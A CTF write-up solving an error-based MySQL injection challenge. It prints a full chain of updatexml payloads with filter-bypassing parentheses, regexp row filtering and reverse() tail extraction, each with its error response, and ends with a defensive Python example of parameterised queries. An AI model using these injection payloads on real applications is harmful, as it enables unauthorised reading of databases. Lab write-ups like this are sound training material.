Challenge
Opening the page shows "register" and "login". Register an arbitrary account first, then log in.
The page shows three cringe-worthy passages of text, and the URL bar carries ?title=xxx.
Clicking the username reveals a change-password function, so there should be an UPDATE statement behind it.
The likely injection points are the username and password, so go back to registration and test there.
Register with the username 1 ' " and return to the change-password page; it now throws an error:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ' "1'"" and pwd='c4ca4238a0b923820dcc509a6f75849b'' at line 1

The statement is probably select * from users where uname="" and pwd=""; so the string is closed with a double quote. This is error-based injection. Spaces are filtered, which can be bypassed with parentheses.

Payload: username=1"||(updatexml(1,concat('~',(select(database()))),1))#&password=123&email=123
Response: XPATH syntax error: '~web_sqli'

Payload: username=1"||(updatexml(1,concat('~',(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))),1))#&password=123&email=123
Response: XPATH syntax error: '~article,flag,users'

Payload: username=1"||(updatexml(1,concat('~',(select(group_concat(column_name))from(information_schema.columns)where(table_name='flag'))),1))#&password=123&email=123
Response: XPATH syntax error: '~flag'

Payload: username=1"||(updatexml(1,concat('~',(select(flag)from(flag))),1))#&password=123&email=123
Response: XPATH syntax error: '~RCTF{Good job! But flag not her'

Move on to the other tables.

Payload: username=1"||(updatexml(1,(select(group_concat(column_name))from(information_schema.columns)where(table_name='users')),1))#&password=123&email=123
Response: XPATH syntax error: ',pwd,email,real_flag_1s_here'

Payload: username=1"||(updatexml(1,(select(real_flag_1s_here)from(users)),1))#&password=123&email=123
Response: Subquery returns more than 1 row

The subquery returns multiple rows, so nothing is echoed back; narrow it down with a regex match.

Payload: username=1"||(updatexml(1,(select(real_flag_1s_here)from(users)where(real_flag_1s_here)regexp('^f')),1))#&password=123&email=123
Response: XPATH syntax error: '{b89b2233-e011-429a-902c-08568c7'

updatexml() truncates the reported string to 32 characters, so use reverse() to read the tail of the value.

Payload: username=1"||(updatexml(1,concat('~',reverse((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f')))),1))#&password=123&email=123
Response: XPATH syntax error: '~}c3f6f7c86580-c209-a924-110e-33'

Reverse the tail back in Python:

>>> s = "}c3f6f7c86580-c209-a924-110e-33"
>>> s = s[::-1]
>>> print(s)
33-e011-429a-902c-08568c7f6f3c}

Joining the two halves gives the flag: flag{b89b2233-e011-429a-902c-08568c7f6f3c}
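As an added illustration from the defender's side (not part of the original writeup), the following shows the root cause the writeup infers: the username is concatenated straight into the lookup query, so a quote character in it rewrites the SQL, while the same query with bound parameters treats it as plain data. It uses an in-memory SQLite table as a stand-in for the challenge's MySQL backend; the table layout, the sample account, md5-hashed passwords and the use of single quotes (the challenge used double quotes, the flaw is the same) are assumptions.

```python
import sqlite3
from hashlib import md5

# Constructed stand-in for the challenge's users table (assumption, not the real backend).
def setup_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (uname TEXT, pwd TEXT, email TEXT)")
    db.execute("INSERT INTO users VALUES (?, ?, ?)",
               ("alice", md5(b"alice-pass").hexdigest(), "a@example.com"))
    return db

def lookup_vulnerable(db, uname, password):
    """WHERE clause built by string concatenation, as the writeup infers the
    challenge did: a quote in uname changes the structure of the statement."""
    pwd_hash = md5(password.encode()).hexdigest()
    sql = f"SELECT uname, email FROM users WHERE uname='{uname}' AND pwd='{pwd_hash}'"
    return db.execute(sql).fetchall()

def lookup_safe(db, uname, password):
    """Same query with bound parameters: uname is always data, never SQL."""
    pwd_hash = md5(password.encode()).hexdigest()
    sql = "SELECT uname, email FROM users WHERE uname=? AND pwd=?"
    return db.execute(sql, (uname, pwd_hash)).fetchall()

def probe(uname, password):
    """Run both variants on one input and report ('ok', rows) or ('error', message).
    A DB error surfacing here is exactly what error-based injection feeds on, so
    the fix is two-fold: bind parameters, and never echo DB errors to the client."""
    db = setup_db()
    results = {}
    for name, fn in (("vulnerable", lookup_vulnerable), ("safe", lookup_safe)):
        try:
            results[name] = ("ok", fn(db, uname, password))
        except sqlite3.Error as e:
            results[name] = ("error", str(e))
    return results

if __name__ == "__main__":
    # The same probe the writeup registered: a username containing quote characters.
    for name, (status, detail) in probe("1 ' \"", "1").items():
        print(f"{name}: {status} {detail}")
```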
References:
https://blog.csdn.net/RABCDXB/article/details/122491459
https://blog.csdn.net/mochu7777777/article/details/105179021
https://blog.csdn.net/weixin_48335916/article/details/112339923